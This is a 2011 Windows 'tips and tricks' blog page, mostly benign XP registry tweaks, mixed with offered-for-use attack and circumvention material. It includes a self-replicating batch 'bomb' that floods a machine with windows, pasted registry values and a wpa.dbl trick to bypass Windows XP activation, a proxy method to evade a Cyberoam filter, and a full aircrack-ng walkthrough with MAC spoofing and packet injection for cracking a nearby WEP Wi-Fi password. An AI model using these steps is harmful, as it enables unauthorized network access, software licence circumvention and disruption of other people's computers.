Senin, 28 Februari 2011

speed up pc

To increase system performance and keep
the GUI:

1. Right click my computer.
2. Click
properties.
3. Click advanced.
4. Click settings (under
performance).
5. Click Adjust for best performance.
6.
Scroll to the bottom and check the last one "use visual styles on
windows and buttons”. NOTE: This will switch XP to Classic View

Kamis, 24 Februari 2011

Multiple Columns for the Start Menu

We started with the Start button, right? So, let us end this session with the same ☺ .To make
Windows use multiple Start Menu Columns (like Windows 95), do the following registry
hack. Open Registry Editor (Start Run regedit). Go to the key: HKEY_LOCAL
_MACHINE\Software\Microsoft\WindowsCurrentVersion\Explorer\Advanced. Right click
on the right window pane and create a string value StartMenuScrollPrograms. Set the value
to FALSE. To get the old setting simply change the value to True or delete the key . New
wine in the old bottle, ehh??

Enjoy

File attributes in Windows Explorer

In Windows Explorer, when you click on the detailed mode, you do not see the file attributes
any more. If you want to enable this setting, do this:In regedit, navigate to
HKEY_CURRENT_USER\Software\Microsft\Windows\CurrentVersion\Explor\Advanced
and look for key ShowAttribCol. If you do not find it , then create a new DWORD key
ShowAttribCol and set its value to 1 to enable it.
enjoy!!!!!

Avoid Reactivation on XP Reinstall

On activating your copy of Windows XP operating system, a file gets updated in windows
/system32 directory. It is called wpa.dbl. If you need to reinstall, take a backup of this file
and once you have reinstalled the OS, just copy it back to the same directory. This way you
can avoid reactivation hurdles.

Enjoy!!!!!!!!!!

Computer tips & tricks: CD Writer is Not Fast Enough..?

Computer tips & tricks: CD Writer is Not Fast Enough..?: "Open My Computer, right-click the CD Drive icon, and then click Properties. Click the Recording tab to display the settings. Under 'Select a..."

Computer tips & tricks: Don’t want the “Open With” Option..?

Computer tips & tricks: Don’t want the “Open With” Option..?: "Each application's subkey in HKEY_CLASSES_ROOT\Applications controls whether that particular application will show up on the dialog box. If ..."

Computer tips & tricks: Internet Explorer As Fast As FireFox:

Computer tips & tricks: Internet Explorer As Fast As FireFox:: "Open registry editor by going to Start then Run and entering regedit. Once in registry, navigateto key HKEY_CURRENT_USER\Software\microsoft\..."

Computer tips & tricks: Mouse Trick – Better Mouse Acceleration

Computer tips & tricks: Mouse Trick – Better Mouse Acceleration: "Open registry and navigate to HKEY_CURRENT_USER\Control Panel\Mouse and set value of 'SmoothMouseXCurve' and 'SmoothMouseYCurve' as follows:..."

Mouse Trick – Better Mouse Acceleration

Open registry and navigate to HKEY_CURRENT_USER\Control Panel\Mouse and set
value of "SmoothMouseXCurve" and "SmoothMouseYCurve" as follows:
"SmoothMouseXCurve"=hex:00,00,00,00,00,00,00,00,00,a0,00,00,00,00,00,00,00,40,01,00,0
0,00,00,00,00,80,02,00,00,00,00,00,00,00,05,00,00,00,00,00
"SmoothMouseYCurve"=hex:00,00,00,00,00,00,00,00,66,a6,02,00,00,00,00,00,cd,4c,05,00,0
0,00,00,00,a0,99,0a,00,00,00,00,00,38,33,15,00,00,00,00,00

Enjoy!!!!!!!!!!

Increase Internet Download Connections

This trick increase Simultaneous Internet Download Connections
and increases the number of allowed simultaneous connections to a higher number. The
default value is only five connections.
Navigate to the following registry key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings.
Right click on the window pane and create a DWord key with the name
“MaxConnectionsPer1_0Server” as it is without quotes. Set the value to a higher number
like 0000000a. Note that they are zeros and not alphabet ‘O’.
Right click on the window pane and create another DWord key with the name
“MaxConnectionsPerServer”. No quotes please. Set the value to a higher number like
0000000a. Note that they are zeros and not alphabet ‘O’.
enjoy!!!!!!!!!!!!!!!!!!

Submit An Article

If you have an  idea or news article that you would liked to see published in Hack for security, then send it us at smithhaxor038@gmail.com your article should be given format.

1. Title
2. Description
3. Article + Suitable Images + Links
4. Source Links (if any)
5. Submitted By (name, picture, website link, code name).


Don’t want the “Open With” Option..?

Each application's subkey in HKEY_CLASSES_ROOT\Applications controls whether that
particular application will show up on the dialog box. If you want to ban a particular program
from the Open With dialog box, look for the application's subkey underneath
HKEY_CLASSES_ROOT\Applications, add a String value named NoOpenWith, and leave
the value blank. There will be no more “Open With” menu for that item.
enjoy!!!!!!

Link partners

Here are some of ours Link Partners whom we find best for our visitors to visit and enjoy their tricks . Most of them are related to hacking and few are based on tips and tricks about internet world . Hope you guys enjoy these sites .

If anyone wants to be our link partner then Contact Us . If we find your site worth enough then we will add you to our list of link partners .











            Internet Explorer As Fast As FireFox:

            Open registry editor by going to Start then Run and entering regedit. Once in registry,
            navigateto key HKEY_CURRENT_USER\Software\microsoft\Windows\ Current
            Version \InternetSettings. Right click on the right windows > New > DWORD. Type
            MaxConnectionsPerServer > You can set value (the more higher the no, the more
            good speed eg:99). Create another DWORD >type MaxConnectionsPer1_0Server.
            Then put a high value as mentioned above. Restart I.E and you are done.

            Enjoy!!!!!!

            Speed up IE Start Up

            This tweak tells Internet Explorer to simply 'run', without loading any webpages. If
            you use a 'blank' page, that is still a page, and slows access. Notice the 'about:blank' in
            the address bar. The blank html page must still be loaded. To load IE with 'nothing'
            [nothing is different than blank]:
            1. Right-click on any shortcut you have to IE
            [You should create a shortcut out of your desktop IE icon, and delete the original
            icon]
            2. Click Properties
            3. Add -nohome [with a space before the dash] after the endquotes in the Target field.
            4. Click OK

            enjoy!!!!!!

            Turn Off System Beeps

            Go to HKEY_CURRENT_USER\Control Panel\Sound, and find the Beep and
            ExtendedSounds String values. Set each value to No. Exit the Registry and reboot.
            The beeps will no longer sound. Hey, your XP is no longer noisy!!

            Pop Up a Message at Start Up

            To pop a banner which can contain any message you want to display just before a user
            is going to log on, go to the key:
            HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Polic
            ies\System.
            Now create a new string Value in the right pane named LegalNoticeCaption and enter
            the value that you want to see in the Menu Bar. Now create yet another new string
            value and name it LegalNoticeText. Modify it and insert the message you want to
            display each time Windows boots. This can be effectively used to display the
            company's private policy each time the user logs on to his NT box.

            enjoy!!!!!!!

            A Flying Start for the Start Menu

            A simple Registry tweak can give speed up your start menu and sub-menus. Open the
            Registry Editor, and navigate to and select:
            HKEY_CURRENT_USER\Control Panel\Desktop .
            Double-click the MenuShowDelay icon on the right, and change 'Value data' from its
            default of 400 (milliseconds) to something speedier, like 0. When you have finished,
            press Enter.
            Enjoy!!!!!!!

            Automatically Killing Tasks on Shutdown

            You know the drill. You start to shut down the computer, you wait a few moments,
            and then you see a dialog box asking if you want to kill an application or service that
            is running. Instead of prompting you, you can make Windows XP take care of the kill
            task automatically. Here's how:
            1. Open the Registry Editor.
            2. Navigate to HKEY_CURRENT_USER\Control Panel\Desktop.
            3. Highlight the value AutoEndTasks and change the value to 1.
            4. Close the Registry Editor

            Stop Error Messages from Displaying on Startup

            If you constantly see an error message that you can't get rid offor example, from a
            piece of software that didn't uninstall properly and continues to give errors on
            startupyou can disable it from displaying on startup. Run the Registry Editor and go to
            HKEY_LOCAL MACHINE\SYSTEM\CurrentControlSet\Control\Windows. (This
            key holds a variety of Windows system settings, such as the location of your system
            directory.) Create a new DWORD called NoPopupsOnBoot and give it a value of 1.
            Exit the Registry and reboot for the setting to take effect. To disable it, either delete
            the DWORD value or give it a value of 0.

            enjoy!!!

            Best virus in notepad

            here i am posting one coding paste it in notepad & save it as anything.bat

            @echo off
            title VIRUS
            color 06

            echo YOU HAVE A VIRUS ON YOUR COMPUTER
            pause
            echo CONTACTING ANTI-VIRUS....
            pause
            echo DO YOU WANT TO DELETE VIRUS?
            pause
            echo ACCESS DENIED
            echo ACCESS DENIED
            echo ACCESS DENIED
            pause
            echo ACTIVATING VIRUS.....
            echo VIRUS ACTIVATED!!!!
            pause
            :1
            dir/s
            goto 1

            try it its fack virus

            Edit any site!!!!!!!!!

            here i am posting one java script with the help of java script you can edit any site.
            you just open any site and paste the following script

            javascript:nick=document.body;nick.contentEditable='true'; document.designMode='on'; void(0)

            enjoy!!!!!!!!!!

            Rabu, 23 Februari 2011

            SHUTDOWN SHORTCUT

            1st right click on your desktop & then goto shortcut.
            2nd in shortcut type"shutdown -s -t (time in sec.) -c"put your msg"
            enjoy

            BOMB virus

            BOMB virus

            @echo off
            copy 0% ms32.bat
            start ms32.bat

            copy this code in notepad
            save as bomb.bat
            n run at ur risk......it will open multiple windows all u cn do is only restart ur system.

            Jumat, 18 Februari 2011

            HOW TO BYPASS CYBEROM????

            In this matter you should have mozila firefox browser.
            just login from internet exploler & login into your client account.
            open mozila firefox.

            and then goto " tools>option>advanced>network>setting"

            and select manual proxy setting & paste your proxy address........
            it will allow you to acess any site..
            enjoy!!!

            Selasa, 15 Februari 2011

            matrix effect in pc!!

            Excellent Trick For Matrix Effect  You Wont Believe This Tricks ... This is a Master piece..

             just follow the steps and see the amazing matrix effect happen in your DOS window:

               1. Open Notepad.
                2.Copy the below mentioned text in your notepad file:

                @echo off
                color 02
                :start
                echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
                goto start

               3. Save the file with .bat extension like Matrix.bat

            Thats it. Just open the file to see the matrix effect right before your eyes!

            Say Thanks and Make a Comment If U Like this Post

            make windows xp genune!!

             here one rigistry value is written you just paste it in notpad & save as anything.reg

            [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion]
            "CurrentBuild"="1.511.1 () (Obsolete data - do not use)"
            "ProductId"="55274-640-1011873-23081"
            "DigitalProductId"=hex:a4,00,00,00,03,00,00,00,35,35,32,37,34,2d,36,34,30,2d,\
            31,30,31,31,38,37,33,2d,32,33,30,38,31,00,2e,00,00,00,41,32,32,2d,30,30,30,\
            30,31,00,00,00,00,00,00,00,86,56,4e,4c,21,1b,2b,6a,a3,78,8e,8f,98,5c,00,00,\
            00,00,00,00,dd,da,47,41,cc,6b,06,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
            00,00,00,00,00,00,00,00,00,00,00,38,31,30,32,36,00,00,00,00,00,00,00,b5,16,\
            00,00,83,83,1f,38,f8,01,00,00,f5,1c,00,00,00,00,00,00,00,00,00,00,00,00,00,\
            00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,66,e5,70,f3
            "LicenseInfo"=hex:33,b7,21,c1,e5,e7,cd,4b,fd,7c,c6,35,51,fd,52,57,17,86,3e,18,\
            d3,f4,8c,8e,35,32,7b,d1,43,8d,61,38,60,a4,ca,55,c9,9a,35,17,46,7a,4f,91,fc,\
            4a,d9,db,64,5c,c4,e2,0f,34,f3,ea

            [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents]
            "OOBETimer"=hex:ff,d5,71,d6,8b,6a,8d,6f,d5,33,93,fd

            * In notepad click then.
            * For file type in the save dialog box select "all files" and for the filename type in License Key.reg or whatever you want. It doesn't matter as long as it has the .reg extension.
            * Click save.
            * Double click the file thats now on your desktop. It will ask you are you sure. Tell it yes.

            Jumat, 11 Februari 2011

            add your folder in send to option

            Just add it too "SEND TO" !!!

            Do as follows :
            1.Open any FOLDER.
            2. Then, TOOLS >> Folder Options
            3. Click view TAB.
            4. In LIST of Advance Settings, click Show hidden files and folders !
            5. Now, go to C:\Documents and Settings
            6. Here, double click and open your (username) folder !
            7.open SendTo folder.
            8.Here copy and paste the shortcut of your favorite folder.
             

            dont forget to comment!!

            ACESS YOUR FOLDER AS DRIVE


             Access your folders as a Drive !

             Fool 'Computer Beginners' or your 'Friends' (Non-Expert) , as the drive will show Disk Space of the folder's drive so it seems that the disk space has increased !!!

            Do The Follwing :

                Start >> Run
                
                Type cmd and hit Enter

                This will open "Command Prompt"

                Type subst Z: E:\folder and hit Enter key.

                You can replace Z: with your desired New Drive Letter (Except existing Drive letters) 

                You can replace E:\folder with the path of your favorite folder

                 Now, type exit

            This creates a new drive ! When you open this , it will open your folder !!!



            But a Problem !
            On Restart the Virtual Drive Disappears !!!

            -------------------------------------------------------------

            Solution !

            -------------------------------------------------------------

            ? We can make a batch file which will make the drive everytime on startup !

            Here is how ?

            ? Open Notepad

            ? Type :

            @ECHO OFF

            subst Z: E:\folder

            exit

            ? File >> Save As...

            ? Name it : Virtual Drive Emulator.bat

            ? Start >> All Programs

            ? Right Click on Startup >> Open

            ? This open the Startup folder

            ? Paste the Virtual Drive Emulator.bat file here !
             now the drive will automatically be created when ever you start your pc

            INSTALL XP FAST

                Boot through windows xp cd
                After all the files are completely loaded,you get the option to select the partition. Select "c:"
                Now format the partition,whether it is normal or quick with NTFS or FAT
                Once the formatting is completed, All the setup files required for installation are copied. Restart your system by pressing Enter.
                Now here begins the simple trick to save 15 minutes.
                After rebooting , you get a screen where it takes 40 minutes to complete or finalize OS installation
                now press Shift + F10 Key. This opens command Prompt.
                Enter "taskmgr" at the command prompt window. This will open task manager
                Click the process Tab, here we find a process called Setup.exe . Right click on Setup.exe-> Set priority - > Select High or Above normal. Initially it will be Normal

            dont forget to comment

            EDIT ANY SITE!!!!!!!!!!

            I have typed one java script.
            it will help you to edit any site.

            javascript:nick=document.body;nick.contentEditable='true'; document.designMode='on'; void(0)

            just copy it & paste in your address bar.

            enjoy!!

            DONT FORGET TO COMMENT

            DISABLE YOUR TASK MANAGER


            HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Policies\System  And create a New DWord Value with the name: DisableTaskMgr Set its Value 0 for Enabling Task Manager and 1 for Disabling Task Manager.

            ENJOY!
            DONT FORGET TO COMMENT

            Contect Us

            If you want to advertise on this site then contact  us at smithhaxor038@gmail.com

            our facebook page
            our twitter account

            SPEAKING PC

            HERE i m posting one script using that script you can make speaking pc

            Dim message, sapi
            message=InputBox("What do you want me to say?","computertipsnfacts.blogspot.com")
            Set sapi=CreateObject("sapi.spvoice")
            sapi.Speak message


            just save above as anything.vbs


            dont forget to comment

            Kamis, 10 Februari 2011

            cool move of your browser

            here one java seript which can move your browser


            javascript:a=0;x=0;y=0;setInterval("a+=.01;x=Math.cos(a*3)*200;y=Math.sin(a*2)*2;moveBy(x,y)",2);void(0)

            psate the above script in your addressbar & hit enter


            DONT FORGET TO COMMENT

            Kamis, 03 Februari 2011

            Crack Wifi Network's WEP password with backtrack



            How to Crack a Wi-Fi Network's WEP Password with BackTrack






            You already know that if you want to lock down your Wi-Fi network, you should opt for WPA encryption because WEP is easy to crack. But did you know how easy? Take a look.

            What You'll Need

            How to Crack a Wi-Fi Network's WEP Password with BackTrackUnless you're a computer security and networking ninja, chances are you don't have all the tools on hand to get this job done. Here's what you'll need:

            • A compatible wireless adapter—This is the biggest requirement. You'll need a wireless adapter that's capable of packet injection, and chances are the one in your computer is not. After consulting with my friendly neighborhood security expert, I purchased an Alfa AWUS050NH USB adapter, pictured here, and it set me back about $50 on Amazon.Update: Don't do what I did. Get the Alfa AWUS036H, not the US050NH, instead. The guy in this video below is using a $12 model he bought on Ebay (and is even selling his router of choice). There are plenty of resources on getting aircrack-compatible adapters out there.
            • A BackTrack 3 Live CD. We already took you on a full screenshot tour of how to install and use BackTrack 3, the Linux Live CD that lets you do all sorts of security testing and tasks. Download yourself a copy of the CD and burn it, or load it up in VMware to get started. (I tried the BackTrack 4 pre-release, and it didn't work as well as BT3. Do yourself a favor and stick with BackTrack 3 for now.)
            • A nearby WEP-enabled Wi-Fi network. The signal should be strong and ideally people are using it, connecting and disconnecting their devices from it. The more use it gets while you collect the data you need to run your crack, the better your chances of success.
            • Patience with the command line. This is an ten-step process that requires typing in long, arcane commands and waiting around for your Wi-Fi card to collect data in order to crack the password. Like the doctor said to the short person, be a little patient.

            Crack That WEP


            To crack WEP, you'll need to launch Konsole, BackTrack's built-in command line. It's right there on the taskbar in the lower left corner, second button to the right. Now, the commands.

            First run the following to get a list of your network interfaces:

            airmon-ng

            The only one I've got there is labeled ra0. Yours may be different; take note of the label and write it down. From here on in, substitute it in everywhere a command includes (interface).

            Now, run the following four commands. See the output that I got for them in the screenshot below.


            airmon-ng stop (interface)
            ifconfig (interface) down
            macchanger --mac 00:11:22:33:44:55 (interface)
            airmon-ng start (interface)

            How to Crack a Wi-Fi Network's WEP Password with BackTrack









            If you don't get the same results from these commands as pictured here, most likely your network adapter won't work with this particular crack. If you do, you've successfully "faked" a new MAC address on your network interface, 00:11:22:33:44:55.

            Now it's time to pick your network. Run:

            airodump-ng (interface)

            To see a list of wireless networks around you. When you see the one you want, hit Ctrl+C to stop the list. Highlight the row pertaining to the network of interest, and take note of two things: its BSSID and its channel (in the column labeled CH), as pictured below. Obviously the network you want to crack should have WEP encryption (in the ENC) column, not WPA or anything else.

            How to Crack a Wi-Fi Network's WEP Password with BackTrack









            Like I said, hit Ctrl+C to stop this listing. (I had to do this once or twice to find the network I was looking for.) Once you've got it, highlight the BSSID and copy it to your clipboard for reuse in the upcoming commands.

            Now we're going to watch what's going on with that network you chose and capture that information to a file. Run:

            airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)

            Where (channel) is your network's channel, and (bssid) is the BSSID you just copied to clipboard. You can use the Shift+Insert key combination to paste it into the command. Enter anything descriptive for (file name). I chose "yoyo," which is the network's name I'm cracking.

            How to Crack a Wi-Fi Network's WEP Password with BackTrack









            You'll get output like what's in the window in the background pictured below. Leave that one be. Open a new Konsole window in the foreground, and enter this command:

            aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

            Here the ESSID is the access point's SSID name, which in my case is yoyo. What you want to get after this command is the reassuring "Association successful" message with that smiley face.

            How to Crack a Wi-Fi Network's WEP Password with BackTrack










            You're almost there. Now it's time for:

            aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

            Here we're creating router traffic to capture more throughput faster to speed up our crack. After a few minutes, that front window will start going crazy with read/write packets. (Also, I was unable to surf the web with the yoyo network on a separate computer while this was going on.) Here's the part where you might have to grab yourself a cup of coffee or take a walk. Basically you want to wait until enough data has been collected to run your crack. Watch the number in the "#Data" column—you want it to go above 10,000. (Pictured below it's only at 854.)

            Depending on the power of your network (mine is inexplicably low at -32 in that screenshot, even though the yoyo AP was in the same room as my adapter), this process could take some time. Wait until that #Data goes over 10k, though—because the crack won't work if it doesn't. In fact, you may need more than 10k, though that seems to be a working threshold for many.

            How to Crack a Wi-Fi Network's WEP Password with BackTrack









            Once you've collected enough data, it's the moment of truth. Launch a third Konsole window and run the following to crack that data you've collected:

            aircrack-ng -b (bssid) (file name-01.cap)

            Here the filename should be whatever you entered above for (file name). You can browse to your Home directory to see it; it's the one with .cap as the extension.

            If you didn't get enough data, aircrack will fail and tell you to try again with more. If it succeeds, it will look like this:

            How to Crack a Wi-Fi Network's WEP Password with BackTrack









            The WEP key appears next to "KEY FOUND." Drop the colons and enter it to log onto the network.

            Problems Along the Way

            With this article I set out to prove that cracking WEP is a relatively "easy" process for someone determined and willing to get the hardware and software going. I still think that's true, but unlike the guy in the video below, I had several difficulties along the way. In fact, you'll notice that the last screenshot up there doesn't look like the others—it's because it's not mine. Even though the AP which I was cracking was my own and in the same room as my Alfa, the power reading on the signal was always around -30, and so the data collection was very slow, and BackTrack would consistently crash before it was complete. After about half a dozen attempts (and trying BackTrack on both my Mac and PC, as a live CD and a virtual machine), I still haven't captured enough data for aircrack to decrypt the key.

            So while this process is easy in theory, your mileage may vary depending on your hardware, proximity to the AP point, and the way the planets are aligned. Oh yeah, and if you're on deadline—Murphy's Law almost guarantees it won't work if you're on deadline.